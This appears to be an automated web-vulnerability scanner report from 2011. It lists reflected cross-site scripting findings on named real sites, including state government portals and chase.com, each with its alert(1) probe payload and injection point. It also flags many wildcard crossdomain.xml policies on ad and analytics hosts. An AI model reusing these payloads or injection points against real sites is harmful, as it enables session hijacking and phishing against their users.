POST /CorpSearch/CorpSear Host: ucc.state.ri.us Proxy-Connection: keep-alive Referer: http://ucc.state.ri.us Content-Length: 448 Cache-Control: max-age=0 Origin: http://ucc.state.ri.us User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB ActiveFlagCrit=Y ...[SNIP]... |
HTTP/1.1 500 Internal Server Error Date: Wed, 13 Jul 2011 00:49:00 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 4846 Content-Type: text/html Cache-control: private <Script Language=JavaScript> alert('System Error: 900105\n\nOur system appears to be experiencing some difficulty at the moment.\n\nPlease try again later or contact technical support for more inform ...[SNIP]... <input type=hidden name=SearchType value="E2a8de"><script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /loginsystem/login.asp |
GET /loginsystem/login.asp Host: ucc.state.ri.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:48:22 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 3894 Content-Type: text/html Expires: Tue, 12 Jul 2011 00:48:22 GMT Cache-control: no-cache <SCRIPT LANGUAGE="JavaScript"> // <!-- var Worklist = "" if (Worklist != "True"){ window.location = "http://ucc.state.ri.us } if (Worklist == "True"){ window.location = "http://ucc.state.ri.us } // --> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ucc.state.ri.us |
Path: | /ucc/uccmenu.asp |
GET /ucc/uccmenu.asp Host: ucc.state.ri.us Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASPSESSIONIDQSDTSCTB |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:47:02 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Pragma: no-cache Content-Length: 7353 Content-Type: text/html Expires: Wed, 13 Jul 2011 00:46:02 GMT Cache-control: no-cache <html> <head> <script LANGUAGE="JavaScript"> <!-- function ucc3() { if (document.UCCMenu alert('You have to select a correct UCC3 type in the list box!'); return false; ...[SNIP]... <input type="hidden" name="FilingMethod" value="I3ad54"style="x:expression ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://www.chase.com |
Path: | /ccp/index.jsp |
GET /ccp/index.jsp?pg_name Host: www.chase.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Server: JPMC1.0 Date: Tue, 12 Jul 2011 16:16:49 GMT Content-length: 12080 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Connection: close <html LANG="EN" > <head> <link rel='stylesheet' type='text/css' href='/ccpmweb/shared <script language='Javas ...[SNIP]... <form name="zipForm" method="post" action="/index.jsp?pg ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://www.chase.com |
Path: | /ccp/index.jsp |
GET /ccp/index.jsp?pg_name Host: www.chase.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Server: JPMC1.0 Date: Tue, 12 Jul 2011 16:16:44 GMT Content-length: 10005 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Connection: close <html LANG="EN" > <head> <link rel='stylesheet' type='text/css' href='/ccpmweb/shared <script language='Javas ...[SNIP]... <form name="zipForm" method="post" action="/index.jsp?pg ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | https://www.chase.com |
Path: | /index.jsp |
POST /index.jsp?pg_name Host: www.chase.com Connection: keep-alive Referer: https://www.chase.com/ccp Content-Length: 200 Cache-Control: max-age=0 Origin: https://www.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Content-Type: application/x-www-form Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId targeturl=https%253A%252F |
HTTP/1.1 200 OK Server: JPMC1.0 Date: Tue, 12 Jul 2011 16:28:01 GMT Content-length: 3744 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Set-Cookie: DCTMSESSION=QfWyTc2R <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html lang="en"> <HEAD> <TITLE> </TITLE> <script language="JavaScript"> //----------------------- ...[SNIP]... 11*/ /*Modified for Prod issue 15591751: ref: WO 108711*/ document.location = "https://www.chase.com /*End Modified for Prod issue: ref: WO 108711*/ } //----------------------- function processCookieOnSuccess() { DeleteCookiesOnSu ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | https://www.chase.com |
Path: | /index.jsp |
GET /index.jsp?pg_name Host: www.chase.com Connection: keep-alive Referer: https://www.chase.com/ccp Cache-Control: max-age=0 Origin: https://www.chase.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId |
HTTP/1.1 200 OK Server: JPMC1.0 Date: Tue, 12 Jul 2011 16:18:26 GMT Content-length: 3784 Content-type: text/html;charset=UTF-8 CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA" Connection: close <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" > <html lang="en"> <HEAD> <TITLE> </TITLE> <script language="JavaScript"> //----------------------- ...[SNIP]... s = 60*1000; ///Negative expiration time set for the timeout cookie to make it session cookie var marketlistExpiration = null ; SetCookieOnSuccess( //new cookie code SetCookieOnSuccess( ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.ct.gov |
Path: | /demhs/site/default.asp |
GET /demhs/site/default.asp?9af27"><script>alert(1)< Host: www.ct.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Date: Wed, 13 Jul 2011 00:39:32 GMT Server: Microsoft-IIS/6.0 X-Powered-By: ASP.NET Content-Length: 31253 Content-Type: text/html Set-Cookie: demhs=SA=False&EA=&SSL Set-Cookie: demhsNav=; path=/demhs Set-Cookie: demhsNav%5FGID=; path=/demhs Cache-control: private <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"> <HTML LANG="en-us"> <DSFHEADER> <!--stopindex--> <HEAD> <!-- This site was built with PPT DSF Technology Dynamic S ...[SNIP]... <a href="/demhs/site/default ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mass.gov |
Path: | / |
GET /?pageID=eopsagencyl Host: www.mass.gov Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:39:32 GMT Server: Apache/2.0.46 (Red Hat) Cache-Control: no-cache, max-age=300 Expires: Wed, 13 Jul 2011 00:44:32 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 9064 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en-US"> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... <title>Massachusetts Emergency Management Agency1b834</title><script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.mass.gov |
Path: | / |
GET /?pageID=ocasubtopic&L=4 Host: www.mass.gov User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://www.mass.gov/ Cookie: fsr.s={"v":1,"rid": |
HTTP/1.1 200 OK Date: Wed, 13 Jul 2011 00:44:56 GMT Server: Apache/2.0.46 (Red Hat) Cache-Control: no-cache, max-age=300 Expires: Wed, 13 Jul 2011 00:49:56 GMT Connection: close Content-Type: text/html;charset=UTF-8 Content-Length: 7576 <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR <html lang="en-US"> <head> <meta http-equiv="Content-Type" content="text/ ...[SNIP]... <title>Foreclosure Resourcesfba97</title><script ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.res-x.com |
Path: | /ws/r2/Resonance.aspx |
GET /ws/r2/Resonance.aspx Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 12 Jul 2011 16:45:10 GMT Content-Length: 3298 r1eh89fa3<img src=a onerror=alert(1) ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www.res-x.com |
Path: | /ws/r2/Resonance.aspx |
GET /ws/r2/Resonance.aspx Host: www.res-x.com Proxy-Connection: keep-alive Referer: http://www.homedepot.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ASP.NET_SessionId |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR CUR PSA PSD OUR IND UNI" Date: Tue, 12 Jul 2011 16:44:59 GMT Content-Length: 138 r1eh({"Resonance":{ |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | / |
GET / HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:04:02 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 19510 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920px; font-size: 1ema7caa--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | / |
GET / HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:04:00 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 19445 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920px430a3--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /General-Website-Tools |
GET /General-Website-Tools Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:02:58 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 20488 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920px; font-size: 1eme4d2a--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /General-Website-Tools |
GET /General-Website-Tools Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:02:56 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 20432 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920px7d056--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /p/developer.html |
GET /p/developer.html HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:04:10 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 25519 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920px; font-size: 1em87721--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://apps.ccbill.com |
Path: | /p/developer.html |
GET /p/developer.html HTTP/1.1 Host: apps.ccbill.com User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13 Accept: text/html,application Accept-Language: en-us,en;q=0.5 Accept-Encoding: gzip,deflate Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Keep-Alive: 115 Proxy-Connection: keep-alive Referer: http://apps.ccbill.com/ Cookie: __utma=250776793 |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:04:08 GMT Server: Apache X-Powered-By: PHP/5.2.8 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache X-Drectory-Script: eSyndiCat Pro v2.3.02 Content-Type: text/html; charset=utf-8 Content-Length: 25497 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html dir="ltr" xmlns="http://www.w3.org ...[SNIP]... <div class="page" style=" width: 920pxfc14d--><script>alert(1)< ...[SNIP]... |
Severity: | Information |
Confidence: | Certain |
Host: | http://www.jpmorganaccess |
Path: | / |
GET /?f0db0"><script>alert(1)< Host: www.jpmorganaccess.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24 Accept: application/xml Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.0 302 This object has moved Content-type: text/html Content-Length: 257 Location: https://tssportal <html><head><title>302 - This object has moved</title></head> <body> <h1>302: This object has moved</h1> <b><p>Please click <A HREF="https://tssportal ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://1.gravatar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: 1.gravatar.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Cache-Control: max-age=300 Content-Type: application/xml Date: Tue, 12 Jul 2011 20:47:03 GMT Expires: Tue, 12 Jul 2011 20:52:03 GMT Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Server: ECS (dca/532A) X-Cache: HIT Content-Length: 261 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://at.amgdgt.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: at.amgdgt.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:39:31 GMT Server: Apache/2.2.3 (CentOS) Last-Modified: Fri, 21 May 2010 08:32:40 GMT ETag: "308cb3d-12e-4871688 Accept-Ranges: bytes Content-Length: 302 Cache-Control: max-age=21600 Expires: Wed, 13 Jul 2011 02:39:31 GMT Connection: close Content-Type: text/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> <allow-access-from domain="all" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: b.scorecardresearch.com |
HTTP/1.0 200 OK Last-Modified: Wed, 10 Jun 2009 18:02:58 GMT Content-Type: application/xml Expires: Wed, 13 Jul 2011 20:46:59 GMT Date: Tue, 12 Jul 2011 20:46:59 GMT Content-Length: 201 Connection: close Cache-Control: private, no-transform, max-age=86400 Server: CS <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*"/> </cross-domain-policy ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://bh.contextweb.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bh.contextweb.com |
HTTP/1.1 200 OK Server: Sun GlassFish Enterprise Server v2.1 ETag: W/"384-1279190951000" Last-Modified: Thu, 15 Jul 2010 10:49:11 GMT Content-Type: application/xml Content-Length: 384 Date: Tue, 12 Jul 2011 21:30:50 GMT Connection: Keep-Alive P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa DEVa PSAa OUR BUS COM NAV INT" <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <!-- Policy file for http://www.contxtweb.com --> <cross-domain-policy> <site-contro ...[SNIP]... <allow-access-from domain="*" secure="false"/> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://idcs.interclick |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: idcs.interclick.com |
HTTP/1.1 200 OK Content-Type: text/xml Last-Modified: Thu, 23 Jun 2011 03:34:28 GMT Accept-Ranges: bytes ETag: "f5f224755631cc1:0" Server: Microsoft-IIS/7.0 X-Powered-By: ASP.NET P3P: policyref="http://www Date: Tue, 12 Jul 2011 20:39:30 GMT Connection: close Content-Length: 225 ...<?xml version="1.0" encoding="utf-8" ?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://metrics.apple.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: metrics.apple.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 17:59:12 GMT Server: Omniture DC/2.0.0 xserver: www46 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://mtrcs.popcap.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: mtrcs.popcap.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:39:19 GMT Server: Omniture DC/2.0.0 xserver: www378 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://pixel.mathtag.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: pixel.mathtag.com |
HTTP/1.0 200 OK Cache-Control: no-cache Connection: close Content-Type: text/cross-domain-policy Etag: 4dd07bc8-e97b-118c-3dec P3P: CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA" Server: mt2/2.0.18.1573 Apr 18 2011 16:09:07 ewr-pixel-x1 pid 0x1b3b 6971 Set-Cookie: ts=1310503212; domain=.mathtag.com; path=/; expires=Wed, 11-Jul-2012 20:40:12 GMT Connection: keep-alive Content-Length: 215 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross- ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://s.gravatar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: s.gravatar.com |
HTTP/1.0 200 OK Accept-Ranges: bytes Content-Type: application/xml Date: Tue, 12 Jul 2011 20:47:00 GMT Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Server: nginx Content-Length: 261 Connection: close <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://stats.adobe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: stats.adobe.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:40:24 GMT Server: Omniture DC/2.0.0 xserver: www1 Content-Length: 167 Keep-Alive: timeout=15 Connection: close Content-Type: text/html <cross-domain-policy> <allow-access-from domain="*" secure="false" /> <allow-http-request </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.burstnet.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.burstnet.com |
HTTP/1.0 200 OK Server: Apache (Unix) P3P: policyref="http://www Last-Modified: Wed, 11 May 2011 13:13:45 GMT ETag: "110080-66-4dca8b89" Accept-Ranges: bytes Content-Length: 102 Content-Type: text/xml Date: Tue, 12 Jul 2011 20:39:27 GMT Connection: close <?xml version="1.0"?> <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | High |
Confidence: | Certain |
Host: | http://www.gravatar.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www.gravatar.com |
HTTP/1.1 200 OK Server: nginx Date: Tue, 12 Jul 2011 20:47:13 GMT Content-Type: application/xml Connection: close Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT Accept-Ranges: bytes Content-Length: 261 <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml <cross-domain-policy> <site-control permitted-cross-domain ...[SNIP]... <allow-access-from domain="*" /> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://www7.lowes.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: www7.lowes.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 21:30:49 GMT Server: Apache P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA" Last-Modified: Thu, 06 Dec 2007 22:23:27 GMT ETag: "13dd40-c7-4758765f" Accept-Ranges: bytes Content-Length: 199 Keep-Alive: timeout=300, max=972 Connection: Keep-Alive Content-Type: application/xml <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*" /> </cross-domain-policy> |
Severity: | Low |
Confidence: | Certain |
Host: | http://blogs.adobe.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: blogs.adobe.com |
HTTP/1.1 200 OK Date: Tue, 12 Jul 2011 20:40:18 GMT Server: Apache Last-Modified: Wed, 03 Feb 2010 03:49:59 GMT ETag: "12c0a86-d8-47eaa1cc427c0 Accept-Ranges: bytes Content-Length: 216 Connection: close Content-Type: text/x-cross-domain <?xml version="1.0"?> <!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia <cross-domain-policy> <allow-access-from domain="*.adobe.com" /> </cross ...[SNIP]... |
Severity: | Low |
Confidence: | Certain |
Host: | http://bstats.adbrite.com |
Path: | /crossdomain.xml |
GET /crossdomain.xml HTTP/1.0 Host: bstats.adbrite.com |
